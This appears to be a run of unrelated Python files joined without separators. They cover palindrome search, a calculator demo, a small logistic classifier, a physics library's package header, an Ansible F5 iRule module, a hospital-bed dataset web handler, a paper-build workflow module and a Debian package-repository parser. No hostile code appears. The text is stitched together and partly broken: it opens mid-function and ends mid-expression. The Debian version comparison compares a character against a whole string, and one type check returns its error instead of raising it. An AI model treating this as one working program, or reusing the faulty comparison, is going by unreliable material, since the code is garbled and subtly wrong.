    # A palindrome of length > 1 must start and end with a repeated character.
    for letter in num_alph:
        if num_alph[letter] > 1:
            repeated.add(letter)
    # Record the positions of every repeated character.
    for v in range(len(word)):
        if word[v] in repeated:
            if word[v] not in alph_index:
                alph_index[word[v]] = [v]
            else:
                alph_index[word[v]].append(v)
    # For every pair of positions of the same character, test whether the
    # enclosed substring equals its reverse.
    for letter in alph_index:
        for c in alph_index[letter][:-1]:
            letter_index = alph_index[letter].index(c)
            for n in alph_index[letter][letter_index + 1:]:
                # print(n, c)
                if word[c:n + 1] == reverse_word[len(word) - n - 1:len(word) - c] and len(word[c:n + 1]) > 1:
                    if word[c:n + 1] not in palindromes:
                        palindromes.add(word[c:n + 1])
    for pal in sorted(palindromes):
        print(pal)
    print()
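# Illustrative check (hedged): for the input line "level", the distinct
# palindromic substrings of length > 1 are "eve" and "level", so the script
# above prints those two strings followed by a blank line. A brute-force
# cross-check of that expectation:
word = "level"
expected = {word[i:j] for i in range(len(word)) for j in range(i + 2, len(word) + 1)
            if word[i:j] == word[i:j][::-1]}
print(sorted(expected))   # ['eve', 'level']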
from Calculator import Calculator

compute = Calculator()

print(compute.addition(10, 25))
print(compute.subtraction(5, 3))
print(compute.multiplication(5, 10))
print(compute.division(10, 2))
print(compute.exponent(5, 3))
print(compute.square_root(6))
print(compute.negate(200))
# Exercise: read an integer and print its successor and its predecessor.
n = int(input('Digite um número: '))
print('\033[7;30mO sucessor do número {} é {}, e o antecessor é {}\033[m'.format(n, n + 1, n - 1))
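# Example (hedged): for an input of 7 the program prints, in reverse video,
# "O sucessor do número 7 é 8, e o antecessor é 6", i.e. n + 1 and n - 1:
n = 7
print(n + 1, n - 1)   # -> 8 6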
import math

import numpy as np


class Classifier:
    def __init__(self, input_size, learning_rate, momentum):
        self.input_size = input_size
        self.learning_rate = learning_rate
        self.momentum = momentum
        self.weights = np.random.uniform(-0.05, 0.05, self.input_size)
        self.previous_weight_changes = np.zeros(input_size)

    def get_output(self, inputs_):
        z = np.dot(inputs_, self.weights)
        # Clamp the pre-activation to protect against overflow in exp().
        if z < -100:
            z = -100
        if z > 100:
            z = 100
        return self.activation_function(z)

    def activation_function(self, z):
        return 1 / (1 + math.exp(-z))

    def update_weights(self, inputs_, error):
        # Gradient-style update with a momentum term from the previous step.
        weight_changes = (self.learning_rate * error) * inputs_ + (self.momentum * self.previous_weight_changes)
        self.weights += weight_changes
        self.previous_weight_changes = weight_changes
        return self.weights

    def get_weights(self):
        return self.weights

    def reset_previous_weight_changes(self):
        self.previous_weight_changes = np.zeros(self.input_size)
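# Hedged usage sketch for the Classifier above: a single logistic unit with
# three inputs. The error expression passed to update_weights is one common
# delta-rule style choice and is an assumption, not part of the class itself.
import numpy as np

clf = Classifier(input_size=3, learning_rate=0.1, momentum=0.9)
x = np.array([1.0, 0.5, -0.2])   # one training example
y = 1.0                          # its target label
out = clf.get_output(x)          # sigmoid of the weighted sum
clf.update_weights(x, error=(y - out) * out * (1 - out))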
# Copyright 2021 D-Wave Systems Inc. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. """``spinbosonchain`` is a Python library for simulating the dynamics of a generalized spin-boson chain model, where both the :math:`z`- and :math:`y`-components of the spins are coupled to bosonic baths, rather than only the :math:`z`-components. The library adopts the quasi-adiabatic path integral (QUAPI) formalism to express the spin system's reduced density matrix as a time-discretized path integral, comprising of a series of influence functionals that encode the non-Markovian dynamics of the system. The path integral is decomposed into a series of components that can be represented by tensor networks. ``spinbosonchain`` currently relies heavily on Google's TensorNetwork_ package for its implementation of tensor networks and related operations. .. _tensornetwork: https://github.com/google/TensorNetwork """ ##################################### ## Load libraries/packages/modules ## ##################################### # Load subpackages. # Load modules. from . import scalar from . import system from . import bath from . import compress from . import alg from . import state from . import ev from . import report from . import version ############################ ## Authorship information ## ############################ __author__ = "D-Wave Systems Inc." __copyright__ = "Copyright 2021" __credits__ = ["Matthew Fitzpatrick"] __version__ = version.version __full_version__ = version.full_version __maintainer__ = "D-Wave Systems Inc." __email__ = "support@dwavesys.com" __status__ = "Development" ################################### ## Useful background information ## ################################### # See e.g. ``https://docs.python.org/3/reference/import.html#regular-packages`` # for a brief discussion of ``__init__.py`` files. ################################## ## Define classes and functions ## ################################## # List of public objects in package. __all__ = ["scalar", "system", "bath", "compress", "alg", "state", "ev", "report", "version", "show_config"] def show_config(): """Print information about the version of ``spinbosonchain`` and libraries it uses. Parameters ---------- Returns ------- """ print(version.version_summary) return None
#!/usr/bin/python # -*- coding: utf-8 -*- # # Copyright 2016 F5 Networks Inc. # # This file is part of Ansible # # Ansible is free software: you can redistribute it and/or modify # it under the terms of the GNU General Public License as published by # the Free Software Foundation, either version 3 of the License, or # (at your option) any later version. # # Ansible is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU General Public License for more details. # # You should have received a copy of the GNU General Public License # along with Ansible. If not, see <http://www.gnu.org/licenses/>. ANSIBLE_METADATA = {'metadata_version': '1.0', 'status': ['preview'], 'supported_by': 'community'} DOCUMENTATION = ''' --- module: bigip_irule short_description: Manage iRules across different modules on a BIG-IP. description: - Manage iRules across different modules on a BIG-IP. version_added: "2.2" options: content: description: - When used instead of 'src', sets the contents of an iRule directly to the specified value. This is for simple values, but can be used with lookup plugins for anything complex or with formatting. Either one of C(src) or C(content) must be provided. module: description: - The BIG-IP module to add the iRule to. required: true choices: - ltm - gtm partition: description: - The partition to create the iRule on. required: false default: Common name: description: - The name of the iRule. required: true src: description: - The iRule file to interpret and upload to the BIG-IP. Either one of C(src) or C(content) must be provided. required: true state: description: - Whether the iRule should exist or not. required: false default: present choices: - present - absent notes: - Requires the f5-sdk Python package on the host. This is as easy as pip install f5-sdk. 
extends_documentation_fragment: f5 requirements: - f5-sdk author: - Tim Rupp (@caphrim007) ''' EXAMPLES = ''' - name: Add the iRule contained in templated irule.tcl to the LTM module bigip_irule: content: "{{ lookup('template', 'irule-template.tcl') }}" module: "ltm" name: "MyiRule" password: "secret" server: "lb.mydomain.com" state: "present" user: "admin" delegate_to: localhost - name: Add the iRule contained in static file irule.tcl to the LTM module bigip_irule: module: "ltm" name: "MyiRule" password: "secret" server: "lb.mydomain.com" src: "irule-static.tcl" state: "present" user: "admin" delegate_to: localhost ''' RETURN = ''' module: description: The module that the iRule was added to returned: changed and success type: string sample: "gtm" src: description: The filename that included the iRule source returned: changed and success, when provided type: string sample: "/opt/src/irules/example1.tcl" name: description: The name of the iRule that was managed returned: changed and success type: string sample: "my-irule" content: description: The content of the iRule that was managed returned: changed and success type: string sample: "when LB_FAILED { set wipHost [LB::server addr] }" partition: description: The partition in which the iRule was managed returned: changed and success type: string sample: "Common" ''' try: from f5.bigip import ManagementRoot from icontrol.session import iControlUnexpectedHTTPError HAS_F5SDK = True except ImportError: HAS_F5SDK = False MODULES = ['gtm', 'ltm'] class BigIpiRule(object): def __init__(self, *args, **kwargs): if not HAS_F5SDK: raise F5ModuleError("The python f5-sdk module is required") if kwargs['state'] != 'absent': if not kwargs['content'] and not kwargs['src']: raise F5ModuleError( "Either 'content' or 'src' must be provided" ) source = kwargs['src'] if source: with open(source) as f: kwargs['content'] = f.read() # The params that change in the module self.cparams = dict() # Stores the params that are sent to the module self.params = kwargs self.api = ManagementRoot(kwargs['server'], kwargs['user'], kwargs['password'], port=kwargs['server_port']) def flush(self): result = dict() state = self.params['state'] try: if state == "present": changed = self.present() elif state == "absent": changed = self.absent() except iControlUnexpectedHTTPError as e: raise F5ModuleError(str(e)) result.update(**self.cparams) result.update(dict(changed=changed)) return result def read(self): """Read information and transform it The values that are returned by BIG-IP in the f5-sdk can have encoding attached to them as well as be completely missing in some cases. Therefore, this method will transform the data from the BIG-IP into a format that is more easily consumable by the rest of the class and the parameters that are supported by the module. 
""" p = dict() name = self.params['name'] partition = self.params['partition'] module = self.params['module'] if module == 'ltm': r = self.api.tm.ltm.rules.rule.load( name=name, partition=partition ) elif module == 'gtm': r = self.api.tm.gtm.rules.rule.load( name=name, partition=partition ) if hasattr(r, 'apiAnonymous'): p['content'] = str(r.apiAnonymous.strip()) p['name'] = name return p def delete(self): params = dict() check_mode = self.params['check_mode'] module = self.params['module'] params['name'] = self.params['name'] params['partition'] = self.params['partition'] self.cparams = camel_dict_to_snake_dict(params) if check_mode: return True if module == 'ltm': r = self.api.tm.ltm.rules.rule.load(**params) r.delete() elif module == 'gtm': r = self.api.tm.gtm.rules.rule.load(**params) r.delete() if self.exists(): raise F5ModuleError("Failed to delete the iRule") return True def exists(self): name = self.params['name'] partition = self.params['partition'] module = self.params['module'] if module == 'ltm': return self.api.tm.ltm.rules.rule.exists( name=name, partition=partition ) elif module == 'gtm': return self.api.tm.gtm.rules.rule.exists( name=name, partition=partition ) def present(self): if self.exists(): return self.update() else: return self.create() def update(self): params = dict() current = self.read() changed = False check_mode = self.params['check_mode'] content = self.params['content'] name = self.params['name'] partition = self.params['partition'] module = self.params['module'] if content is not None: content = content.strip() if 'content' in current: if content != current['content']: params['apiAnonymous'] = content else: params['apiAnonymous'] = content if params: changed = True params['name'] = name params['partition'] = partition self.cparams = camel_dict_to_snake_dict(params) if 'api_anonymous' in self.cparams: self.cparams['content'] = self.cparams.pop('api_anonymous') if self.params['src']: self.cparams['src'] = self.params['src'] if check_mode: return changed else: return changed if module == 'ltm': d = self.api.tm.ltm.rules.rule.load( name=name, partition=partition ) d.update(**params) d.refresh() elif module == 'gtm': d = self.api.tm.gtm.rules.rule.load( name=name, partition=partition ) d.update(**params) d.refresh() return True def create(self): params = dict() check_mode = self.params['check_mode'] content = self.params['content'] name = self.params['name'] partition = self.params['partition'] module = self.params['module'] if check_mode: return True if content is not None: params['apiAnonymous'] = content.strip() params['name'] = name params['partition'] = partition self.cparams = camel_dict_to_snake_dict(params) if 'api_anonymous' in self.cparams: self.cparams['content'] = self.cparams.pop('api_anonymous') if self.params['src']: self.cparams['src'] = self.params['src'] if check_mode: return True if module == 'ltm': d = self.api.tm.ltm.rules.rule d.create(**params) elif module == 'gtm': d = self.api.tm.gtm.rules.rule d.create(**params) if not self.exists(): raise F5ModuleError("Failed to create the iRule") return True def absent(self): changed = False if self.exists(): changed = self.delete() return changed def main(): argument_spec = f5_argument_spec() meta_args = dict( content=dict(required=False, default=None), src=dict(required=False, default=None), name=dict(required=True), module=dict(required=True, choices=MODULES) ) argument_spec.update(meta_args) module = AnsibleModule( argument_spec=argument_spec, supports_check_mode=True, mutually_exclusive=[ 
['content', 'src'] ] ) try: obj = BigIpiRule(check_mode=module.check_mode, **module.params) result = obj.flush() module.exit_json(**result) except F5ModuleError as e: module.fail_json(msg=str(e)) from ansible.module_utils.basic import * from ansible.module_utils.ec2 import camel_dict_to_snake_dict from ansible.module_utils.f5_utils import * if __name__ == '__main__': main()
from datetime import datetime
import io
import os

from absl import logging  # noqa: F401
import tornado.web

from icubam.db import store, synchronizer
from icubam.www.handlers import base


class DatasetHandler(base.APIKeyProtectedHandler):

  ROUTE = '/db/(.*)'
  API_COOKIE = 'api'
  ACCESS = [
    store.AccessTypes.STATS, store.AccessTypes.ALL, store.AccessTypes.UPLOAD
  ]
  GET_ACCESS = [store.AccessTypes.ALL, store.AccessTypes.STATS]
  POST_ACCESS = [store.AccessTypes.UPLOAD, store.AccessTypes.STATS]

  def initialize(self, config, db_factory, dataset, upload_path):
    super().initialize(config, db_factory)
    self.dataset = dataset
    self.upload_path = upload_path

  @base.authenticated(code=503)
  def get(self, collection):
    file_format = self.get_query_argument('format', default=None)
    max_ts = self.get_query_argument('max_ts', default=None)
    df = self.dataset.get(collection, max_ts)
    if df is None:
      logging.info(f"API called with incorrect endpoint: {collection}.")
      self.set_status(404)
      return

    if file_format == 'csv':
      stream = io.StringIO()
      df.to_csv(stream, index=False)
      self.write(stream.getvalue())
    else:
      self.write(df.to_html())

  @tornado.web.authenticated
  def post(self, collection):
    if self.current_user.access_type not in self.POST_ACCESS:
      logging.info(
        f"API called with incorrect access_type: {self.current_user.access_type}."
      )
      self.set_status(403)
      return

    # Send to the correct endpoint:
    if collection == 'bedcounts':
      csvp = synchronizer.CSVPreprocessor(self.db)

      # Get the file object and format request:
      file = self.request.files["file"][0]
      file_format = self.get_query_argument('format', default=None)
      file_name = None

      # Pre-process with the correct method:
      if file_format == 'ror_idf':
        input_buf = io.StringIO(file["body"].decode('utf-8'))
        try:
          csvp.sync_bedcounts_ror_idf(input_buf)
        except Exception as e:
          logging.error(f"Couldn't sync: {e}")
        file_name = 'ror_idf'
      else:
        logging.debug(f"API called with incorrect file_format: {file_format}.")
        self.set_status(400)
        return

      # Save the file locally just in case:
      time_str = datetime.now().strftime('%Y-%m-%d-%H:%M:%S')
      file_path = os.path.join(self.upload_path, f"{time_str}-{file_name}")
      try:
        with open(file_path, "wb") as f:
          f.write(file["body"])
        logging.info(f"Received {file_path} from {self.request.remote_ip}.")
      except IOError as e:
        logging.error(f"Failed to write file due to IOError: {e}")

    # Or 404 if bad endpoint:
    else:
      logging.error(f"DB POST accessed with incorrect endpoint: {collection}.")
      self.set_status(404)
      return
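# Hedged usage notes for the handler above. The host and API key below are
# deployment-specific placeholders; only the /db/<collection> route, the
# 'format'/'max_ts' query arguments and the 'api' cookie name come from the
# code itself.
#
#   GET  /db/<collection>?format=csv&max_ts=...  -> CSV dump of the dataset
#   GET  /db/<collection>                        -> HTML table
#   POST /db/bedcounts?format=ror_idf            -> CSV upload, multipart field "file"
#
# For example, with the requests library and a valid key:
#   requests.get("http://icubam.example/db/bedcounts",
#                params={"format": "csv"}, cookies={"api": "<key>"})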
""" Miscellaneous files used throughout the workflow. The static members of the class ``files`` are populated automatically as the workflow reads the user config. """ from sphinx_mock import * class files: """Houses lists of support files used throughout the workflow.""" #: The manually-uploaded datasets for this article that must be downloaded zenodo_files_manual = [] #: The showyourwork-managed datasets for this article zenodo_files_auto = [] #: The `.zenodo` files in which we store the URL for the datasets #: We make the PDF generation depend on these so we always have #: access to the URLs for the icon generation. #: These are updated in `zenodo.smk`. dot_zenodo = [] #: Auxiliary files we copy over to the user's `src/` directory. aux = [ posix(relpaths.tex / file.name) for file in (abspaths.workflow / "resources" / "tex").glob("*.*") ] #: Class-specific auxiliary files. cls = {} for folder in (abspaths.workflow / "resources" / "classes").glob("*"): cls[folder.name] = [ file.name for file in (abspaths.workflow / "resources" / "classes" / folder).glob( "*.*" ) ] #: Dependencies of the manuscript defined by the user for file in config["dependencies"]: if file == config["ms"]: ms_deps = config["dependencies"][file] break else: ms_deps = [] #: Dummy file dependency for figures w/ unknown parent scripts. unknown = "unknown-script" #: Temporary tex file. tmp_xml = ".showyourwork-xml-ms" #: Temporary tex file. tmp_syw = ".showyourwork-ms" if config["tectonic_latest"]: #: Tectonic command tectonic = [posix(relpaths.temp / "tectonic")] else: #: Tectonic command tectonic = [] #: Figures that are allowed directly in the ``src/`` directory special_figures = ["orcid-id.png", "orcid-ID.png", "showyourwork.pdf"] #: Store temporary exception messages exception = relpaths.temp / "exception.log" #: Store temporary warning messages warning = relpaths.temp / "warning.log" #: Recognized figure script extensions script_extensions = [] for ext in config["scripts"]: script_extensions.append(ext)
import requests import shutil import bz2 import os import hashlib import io from urllib.parse import urlparse import re from queue import Queue import itertools from functools import reduce __all__ = [ 'Repo', 'LocalRepo', 'RepoSet', 'Package', 'PkgReq', ] class HashTools: """ https://stackoverflow.com/a/3431835/5279817 """ @classmethod def hash_bytestr_iter(cls, bytesiter, hasher, ashexstr=False): for block in bytesiter: hasher.update(block) return (hasher.hexdigest() if ashexstr else hasher.digest()) @classmethod def file_as_blockiter(cls, afile, blocksize=0x10000): with afile: block = afile.read(blocksize) while len(block) > 0: yield block block = afile.read(blocksize) @classmethod def hash_file(cls, filename, hasher, ashexstr=False): with open(filename, 'rb') as f: return cls.hash_bytestr_iter(cls.file_as_blockiter(f), hasher, ashexstr) class Utils: @staticmethod def download_file(url, local_filename=None): if local_filename is None: local_filename = url.split('/')[-1] print('[*] Downloading %s to %s'%(url, local_filename)) r = requests.get(url, stream=True) with open(local_filename, 'wb') as f: shutil.copyfileobj(r.raw, f) return local_filename @staticmethod def asstring_to_dict(asstring): ret = dict() key = None for raws in asstring.split('\n'): s = raws.strip() if not s: continue # comment if raws[0] == '#': continue if ':' in s: key, val = s.split(':', maxsplit=1) ret[key] = val.strip() else: if key is None: raise Exception('Expected `:` on line %s' % raws) ret[key] = '\n'.join((ret[key], raws)) return ret class DebianVersion: EPOCH_REGEX = re.compile(r'^([0-9]*(?=:))?:(.*)') def __init__(self, s): s = s.strip() epoch_match = self.EPOCH_REGEX.match(s) if epoch_match: self.epoch = int(epoch_match.group(1)) v = epoch_match.group(2) else: self.epoch = 0 v = s v = v.rsplit('-', 1) self.upstream = v[0] self.revision = v[1] if len(v) != 1 else '' @staticmethod def _char_code(c): if len(c) != 1: c = c[0] if c == '~': return 0; # tilde sort before anything if (ord('a') <= ord(c) <= ord('z')) or (ord('A') <= ord(c) <= ord('Z')): return ord(c) - ord('A') + 1 if c in '.+-': return ord(c) + ord('z') + 1 raise Exception('Unexpected char %s in charcode' % c) @classmethod def _cmp_vers(cls, l, r): alpre = re.compile(r'([^0-9]*)([0-9]*.*)') numre = re.compile(r'([0-9]*)([^0-9]*.*)') anow = True while l and r: rgx = alpre if anow else numre lm = rgx.match(l) rm = rgx.match(r) l = lm.group(2) r = rm.group(2) lg = lm.group(1) rg = rm.group(1) if lg != rg: if anow: for lc, rc in zip(lg, rg): diff = cls._char_code(lc) - cls._char_code(rg) if diff != 0: return diff # tilde is sorted before empty part if len(lg) > len(rg): return -1 if lg[len(rg)] == '~' else +1 elif len(lg) < len(rg): return +1 if rg[len(lg)] == '~' else -1 else: diff = int(lg) - int(rg) if diff != 0: return diff anow = not anow if l or r: if len(l) > len(r): return -1 if l[len(r)] == '~' else +1 elif len(l) < len(r): return +1 if r[len(l)] == '~' else -1 return 0 def _cmp(self, other): diff = self.epoch - other.epoch diff = self._cmp_vers(self.upstream, other.upstream) if diff == 0 else diff diff = self._cmp_vers(self.revision, other.revision) if diff == 0 else diff return (1 if diff > 0 else -1) if diff != 0 else 0 def __eq__(self, other): if not isinstance(other, self.__class__): return NotImplemented return self._cmp(other) == 0 def __ne__(self, other): if not isinstance(other, self.__class__): return NotImplemented return self._cmp(other) != 0 def __lt__(self, other): if not isinstance(other, self.__class__): return NotImplemented 
return self._cmp(other) < 0 def __le__(self, other): if not isinstance(other, self.__class__): return NotImplemented return self._cmp(other) <= 0 def __gt__(self, other): if not isinstance(other, self.__class__): return NotImplemented return self._cmp(other) > 0 def __ge__(self, other): if not isinstance(other, self.__class__): return NotImplemented return self._cmp(other) >= 0 def __str__(self): vers = self.upstream if self.revision: vers = '-'.join((vers, self.revision)) if self.epoch: vers = ':'.join((str(self.epoch), vers)) return vers def __repr__(self): return '<epoch={} upstream={} revision={}>'.format(self.epoch, self.upstream, self.revision) def __hash__(self): return hash(str(self)) class VersionReq: OPS = { '>>': (1,), '<<': (-1,), '==': (0,), '!=': (-1, 1), '>=': (0, 1), '<=': (-1, 0), } def __init__(self, s): s = s.strip() # hack for firmware if s.startswith('firmware'): s = s[len('firmware'):].strip() op = s[:2] # dirty hack for one char variants if op[0] in '<=>' and op[1] not in '<=>': op = op[0] self.vers = DebianVersion(s[len(op):]) if len(op) == 1: op = op + op if op not in self.OPS: raise ValueError('invalid op: %s' % op) self.op = op self.possibilities = self.OPS[self.op] def satisfied_by(self, vers): if not isinstance(vers, self.vers.__class__): vers = self.vers.__class__(vers) return vers._cmp(self.vers) in self.possibilities def __repr__(self): return '{} {}'.format(self.op, str(self.vers)) class PkgReq: def __init__(self, s): s = s.strip() self._subreqs = set(SubPkgReq(sub) for sub in s.split('|')) self.names = set(sr.name for sr in self._subreqs) def satisfied_by(self, pkg, exact=False): for req in self._subreqs: if req.satisfied_by(pkg, exact): return True return False def __repr__(self): return '<{}>'.format(' | '.join(map(repr, self._subreqs))) def __eq__(self, other): if not isinstance(other, self.__class__): return NotImplemented return self._subreqs == other._subreqs def __ne__(self, other): if not isinstance(other, self.__class__): return NotImplemented return self._subreqs != other._subreqs def __hash__(self): return reduce(lambda x, y: x ^ hash(y), self._subreqs, 0) class SubPkgReq: def __init__(self, s): name = s.strip() vers_match = re.match(r'(.*) \((.*)\)', s) if vers_match: self.name = vers_match.group(1).strip() self.version_req = VersionReq(vers_match.group(2)) else: self.name = name self.version_req = None def satisfied_by(self, pkg, exact=False): if self.name != pkg.name and (exact or self.name not in pkg.provides): return False if self.version_req: return self.version_req.satisfied_by(pkg.version) return True def __repr__(self): return '{}{}'.format(self.name, ' ({})'.format(self.version_req) if self.version_req else '') def __eq__(self, other): if not isinstance(other, self.__class__): return NotImplemented return self.name == other.name and self.version_req == other.version_req def __ne__(self, other): if not isinstance(other, self.__class__): return NotImplemented return self.name != other.name or self.version_req != other.version_req def __hash__(self): return hash(self.name) ^ hash(self.version_req) class Package: def __init__(self, asstring, repo=None): self._params = Utils.asstring_to_dict(asstring) self.repo = repo self.name = self._params['Package'] self.version = DebianVersion(self._params['Version']) self.filename = self._params.get('Filename') self.provides = set() for s in self._params.get('Provides', '').split(','): s = s.strip() if s: self.provides.add(s.strip()) def get_csv_param(key): for s in self._params.get(key, 
'').strip().split(','): s = s.strip() if s: yield s self.depends = set() for s in itertools.chain(get_csv_param('Depends'), get_csv_param('Pre-Depends')): try: self.depends.add(PkgReq(s)) except ValueError: print('Fail on %s: dep %s' % (self, s)) raise self.conflicts = set() for s in get_csv_param('Conflicts'): try: self.conflicts.add(PkgReq(s)) except ValueError: print('Fail on %s: conf %s' % (self, s)) raise self.integrity = { 'size': int(self._params.get('Size', 0)) or None, 'md5': self._params.get('MD5sum'), 'sha1': self._params.get('SHA1'), 'sha256': self._params.get('SHA256'), } def download(self, saveto=None): if self.repo is None or self.filename is None: raise Exception('Filename/Repo is None, cant download') fname = Utils.download_file(self.repo.relative_url(self.filename), local_filename=saveto) integ = self._check_integrity(fname) if not integ[0]: os.remove(fname) raise Exception('integrity error: %s' % integ[1]) return fname def _check_integrity(self, fname): try: for k, v in self.integrity.items(): if v is None: continue if k == 'size': act_size = os.path.getsize(fname) if act_size != v: raise Exception('integrity error: Expected size %d, got %d' % (v, act_size)) elif k in ('md5', 'sha1', 'sha256'): if k == 'md5': hasher = hashlib.md5() elif k == 'sha1': hasher = hashlib.sha1() elif k == 'sha256': hasher = hashlib.sha256() vupper = v.upper() act_v = HashTools.hash_file(fname, hasher, ashexstr=True).upper() if vupper != act_v: raise Exception('integrity error: Expected hash %s to be %s, got %s' % (k, vupper, act_v)) else: raise Exception('unknown integrity check type: %s' % k) except Exception as e: return False, ' '.join(e.args) return True, 'ok' def __repr__(self): return '<Package {} v{}{}>'.format( self.name, self.version, (' (from %s)' % str(self.repo)) if self.repo else '' ) def __eq__(self, other): if not isinstance(other, Package): return NotImplemented return (self.repo == other.repo) and (self.name == other.name) and (self.version == other.version) def __ne__(self, other): if not isinstance(other, Package): return NotImplemented return not (self == other) def __hash__(self): return hash(self.name) ^ hash(self.version) ^ hash(self.repo) def asstring(self): return '\n'.join('{}: {}'.format(k, v) for k, v in self._params.items()) class Repo: def __init__(self, url, dist=None, comp=None, arch='iphoneos-arm'): self.url = url if dist is None: release_path = 'Release' else: release_path = '/'.join(('dists', dist, 'Release')) release = self._fetch_relative(release_path, verify=False) if release.ok: self._release = Utils.asstring_to_dict(release.text) self.name = self._release['Origin'] self.label = self._release.get('Label', self.name) else: self._release = dict() urlparsed = urlparse(self.url) self.name = urlparsed.netloc + urlparsed.path self.label = self.name self._integrity_by_file = dict() if 'MD5Sum' in self._release: for l in self._release['MD5Sum'].split('\n'): l = l.strip() if not l: continue md5sum, size, name = map(str.strip, l.split()) self._integrity_by_file[name] = { 'size': int(size), 'md5': md5sum } self.packages = list() self.packages_by_name = dict() if dist is None or comp is None: packages_path = 'Packages' else: packages_path = '/'.join(('dists', dist, comp, 'binary-' + arch, 'Packages')) for pkgstr in self._fetch_bz2(packages_path).split('\n\n'): if not pkgstr: continue pkg = Package(pkgstr, self) self.packages.append(pkg) if pkg.name in self.packages_by_name: # print('warning: duplicate package %s' % pkg, end=' -- ') prevpkg = 
self.packages_by_name[pkg.name] if pkg.version > prevpkg.version: # print('overriding prev (%s) since prev is older' % prevpkg) self.packages_by_name[pkg.name] = pkg else: pass # print('not overriding prev (%s) since prev is newer' % prevpkg) else: self.packages_by_name[pkg.name] = pkg def _fetch(self, url): return requests.get(url, stream=True) def _fetch_relative(self, uri, verify=True): url = self.relative_url(uri) r = self._fetch(url) if r.ok and verify: integ = self._integrity_by_file.get(uri) if integ: if 'size' in integ: act_size = len(r.content) exp_size = integ['size'] if act_size != exp_size: raise Exception('integrity error for %s: expcected size %d, got %d' % (uri, exp_size, act_size)) if 'md5' in integ: exp_md5 = integ['md5'].upper() act_md5 = HashTools.hash_bytestr_iter(HashTools.file_as_blockiter(io.BytesIO(r.content)), hashlib.md5(), True).upper() if exp_md5 != act_md5: raise Exception('integrity error for %s: Expected md5 %s, got %s' % (uri, exp_md5, act_md5)) return r def _fetch_bz2(self, name): r = self._fetch_relative(name + '.bz2') if r.ok: return bz2.decompress(r.content).decode('utf-8', errors='ignore') r = self._fetch_relative(name) if r.ok: return r.content.decode('utf-8', errors='ignore') raise Exception('%s & %s.bz2 are missing' % (name, name)) def satisfy_req(self, req): if not isinstance(req, PkgReq): req = PkgReq(req) for name in req.names: fast = self.packages_by_name.get(name) if fast is not None and req.satisfied_by(fast): return fast for p in self.packages: if req.satisfied_by(p): return p return None def relative_url(self, rel): return '%s/%s' % (self.url, rel) def __repr__(self): return '<Repo {} with {} packages>'.format(self.name, len(self.packages)) def __str__(self): return '<{}>'.format(self.label) def __eq__(self, other): if not isinstance(other, Repo): return NotImplemented return self.url == other.url def __ne__(self, other): if not isinstance(other, Repo): return NotImplemented return self.url != other.url def __hash__(self): return hash(self.url) class LocalRepo(Repo): class FakeResponse: def __init__(self, ok, content=None): self.ok = ok if content is not None: self.content = content self.text = content.decode('utf-8', errors='ignore') def __init__(self, url, dist=None, comp=None, arch='iphoneos-arm'): super().__init__(url, dist, comp, arch) self.url = os.path.abspath(self.url) def __repr__(self): return '<LocalRepo {} with {} packages>'.format(self.name, len(self.packages)) def _fetch(self, url): try: with open(url, 'rb') as f: return self.FakeResponse(True, f.read()) except FileNotFoundError: return self.FakeResponse(False) class RepoSet: def __init__(self, repos): self.repos = set() self.packages_by_name = dict() self.add_repos(repos) def _update_pkgs_by_name(self, new_repos=None, removed_repos=None): if new_repos is not None: for repo in new_repos: for _, pkg in repo.packages_by_name.items(): if pkg.name in self.packages_by_name: # print('warning: duplicate package %s' % pkg, end=' -- ') prevpkg = self.packages_by_name[pkg.name] if pkg.version > prevpkg.version: # print('overriding prev (%s) since prev is older' % prevpkg) self.packages_by_name[pkg.name] = pkg else: pass # print('not overriding prev (%s) since prev is newer' % prevpkg) else: self.packages_by_name[pkg.name] = pkg if removed_repos is not None: removed_pkg_names = set() for _, pkg in self.packages_by_name.items(): if pkg.repo in removed_repos: removed_pkg_names.add(pkg.name) for n in removed_pkg_names: del self.packages_by_name[n] p = self.satisfy_req(n) if p is not None: 
self.packages_by_name[n] = p def add_repos(self, repos): added = set() for r in repos: if not isinstance(r, Repo): r = Repo(r) if r not in self.repos: added.add(r) self.repos.add(r) self._update_pkgs_by_name(new_repos=added) def remove_repos(self, repos): removed = set() for r in repos: if not isinstance(r, Repo): r = Repo(r) if r in self.repos: removed.add(r) self.repos.remove(r) self._update_pkgs_by_name(removed_repos=removed) def satisfy_req(self, req): if not isinstance(req, PkgReq): req = PkgReq(req) for name in req.names: fast = self.packages_by_name.get(name) if fast is not None and req.satisfied_by(fast): return fast bestp = None for r in self.repos: p = r.satisfy_req(req) if p is not None: if (bestp is None) or (bestp.version < p.version): bestp = p return bestp def satisfy_pkg_deps(self, needed_pkg, recursive=False): if not isinstance(needed_pkg, Package): return TypeError('needed_pkg must be %s' % Package) # XXX perform magic woodo on req and not on pkgs to avoid extra lookups alldeps = set() allreqs = set() pkgs = Queue() pkgs.put(needed_pkg) while not pkgs.empty(): pkg = pkgs.get() for req in pkg.depends: if req in allreqs: continue allreqs.add(req) p = self.satisfy_req(req) if p is None: raise Exception('Cant satisfy requirement: %s (for pkg %s)' % (req, pkg.name)) if p not in alldeps and p != needed_pkg: # print('[ADDED %s] -- because required by %s' % (p, pkg)) alldeps.add(p) if recursive: pkgs.put(p) conflict = self._pkgset_has_conflicts(alldeps) if conflict: raise Exception('conflict: {}'.format(conflict)) return alldeps def satisfy_reqs_n_deps(self, reqs): if isinstance(reqs, (str, PkgReq)): reqs = [reqs] requirements = (req if isinstance(req, PkgReq) else PkgReq(req) for req in reqs) reqdeps = set(self.satisfy_req(req) for req in requirements) deps = set() for r in reqdeps: deps.update(self.satisfy_pkg_deps(r, recursive=True)) reqdeps.update(deps) conflict = self._pkgset_has_conflicts(reqdeps) if conflict: raise Exception('conflict: {}'.format(conflict)) return reqdeps @staticmethod def _pkgset_has_conflicts(pkgset): confs = dict() for d in pkgset: for c in d.conflicts: if c in confs: confs[c] += [d] else: confs[c] = [d] for conf, pkgs in confs.items(): for d in pkgset: if conf.satisfied_by(d, exact=True): return conf, pkgs return None def __str__(self): return '<RepoSet with %d repos>' % len(self.repos) def __repr__(self): return '<RepoSet {%s}>' % ', 